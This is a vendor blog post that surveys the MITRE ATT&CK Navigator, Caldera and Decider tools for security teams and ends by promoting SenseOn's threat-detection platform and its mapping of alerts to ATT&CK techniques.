A Guide to MITRE ATT&CK Tools
MITRE ATT&CK tools can help security teams to get started with MITRE’s renowned knowledge base.
Created in 2013, the MITRE ATT&CK framework, which breaks down attacks in a consistent manner, has grown steadily in popularity. Today, it is an important resource for security teams working in businesses of all sizes and across all types of industries.
In 2022, research by ESG found that almost 1 in 2 organisations use ATT&CK “extensively,” while a similar number use it on a limited basis.
However, while many organisations claim that ATT&CK is “critical” or “important” (according to ESG) for their future security operations strategy, past research shows that many security professionals (52% in one survey) are not very confident in their abilities to use ATT&CK in their day to day work. This finding is confirmed by more recent research.
Luckily, there are plenty of tools security teams can use to make ATT&CK actionable. Here are three of them, plus how SenseOn automates MITRE ATT&CK to improve security teams’ threat detection capabilities.
ATT&CK Navigator
ATT&CK Navigator is a free tool created by the MITRE Corporation. It helps organisations and teams make sense of the MITRE ATT&CK knowledge base.
The purpose of ATT&CK Navigator is to make it easier for organisations to navigate, annotate, and visualise ATT&CK—something that security teams have been doing already in spreadsheets. The tool just makes this easier.
ATT&CK Navigator is designed to be fairly generic, meaning that different organisations can use the tool for different purposes depending on their needs. For example, red/blue team planning, highlighting the frequency of detected techniques and identifying gaps in defensive coverage.
In our blog post on why and how organisations should adopt a “compromised mindset,” we talk about using ATT&CK Navigator to pinpoint the tactics and techniques of threat groups that may be of particular significance to your organisation/industry.
Organisations can use ATT&CK Navigator for Enterprise, Mobile, and ICS ATT&CK matrices or custom ATT&CK collections or STIX bundles. Since Navigator is web-based, it requires no installation. That being said, security professionals that want to use it locally have the option of downloading the file.
Caldera
Developed by MITRE, Caldera is a free, automated adversary emulation system. It was built on the ATT&CK framework and gives security teams a way to run simulated cyber attacks in a safe environment.
Although Caldera can be used in many different ways, most organisations use it for defensive (blue) and offensive (red) operations.
Mitre identifies three core use cases for Caldera:
Autonomous red team engagements. Security teams can build cyber threat profiles based on relevant adversary tactics, techniques, and procedures (TTPs) in ATT&CK and then launch these profiles to see where weaknesses in their defences may lie. This was Caldera’s original use case.
Autonomous incident response. Through deployed agents, security teams can identify the TTPs that other security controls might miss.
Manual red team engagements. Security teams can replace or append other offensive tools with Caldera when undertaking manual red team assessments.
The Caldera platform consists of the core system and plugins. The latter gives additional functionality. For example, the Human plugin can perform random, human-like behaviours on Windows, Linux, and Mac systems.
Something to keep in mind is that Caldera can be time-intensive to set up. However, on the whole, the process is well-documented on GitHub.
Decider
Decider is the latest ATT&CK tool that makes it easier for organisations to map adversary behaviour to the ATT&CK framework and figure out attackers’ next moves, irrespective of security professionals’ expertise and knowledge of ATT&CK.
Created by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in collaboration with MITRE and the Homeland Security Systems Engineering and Development Institute (HSSEDI), Decider can be used alongside the second edition of CISA’s ATT&CK mapping guide.
Decider works by asking users several guided questions about how threats are behaving to help security teams identify the correct ATT&CK tactics, techniques, and sub-techniques they’re seeing. Questions are phrased in straightforward language, for example, “What is the adversary trying to do?”
Not only does Decider help identify the technique/sub-technique being used, but it also includes details about the behaviour directly from MITRE ATT&CK matrices, as well as gives a list of similar techniques and the ability to flag potentially incorrect mappings.
According to section chief at CISA James Stanley, the idea was to “make it [ATT&CK framework] available to, say, junior analysts who could benefit from using it in real-time during middle-of-the-night incident response, for instance.”
Within Decider, organisations can save relevant techniques, add their own notes, and export these to be uploaded elsewhere, like a Microsoft Word table or ATT&CK Navigator.
Since Decider is a web application, users need to host it before they can use it.
How SenseOn Uses MITRE ATT&CK for Threat Detection
SenseOn’s threat detection, investigation, and response platform integrates the MITRE ATT&CK framework to give security professionals context around attacker behaviour. This allows organisations to respond to threats faster and more effectively.
Anytime SenseOn spots suspicious behaviour (or “Observation”), it maps it against adversary TTPs in ATT&CK in real-time.
Notably, SenseOn flags only genuine alerts. It can do this because it was built to natively combine the capabilities of EDR, NDR, SIEM, and SOAR. As a result, it can collect and correlate data from across an organisation’s entire digital estate (endpoints, network, and cloud infrastructure). Rather than looking at events in isolation, SenseOn can also look at them in combination with other data points.
When SenseOn spots a connection between suspicious behaviours, it builds a “Case.” Like Observations, Cases are also mapped to the ATT&CK framework.
Cases show a timeline of suspicious events, the relationship between targeted devices, and the ATT&CK techniques and sub-techniques used. Cases also include links to the relevant sections of the ATT&CK website so that analysts can read more about the techniques they’re seeing in their environment and the mitigations for each.
In time-sensitive attacks like ransomware, where every second counts, SenseOn can also use automation to isolate infected devices and prevent lateral movement.
Learn more about how SenseOn automates the MITRE ATT&CK framework, or arrange a demo of the SenseOn platform today.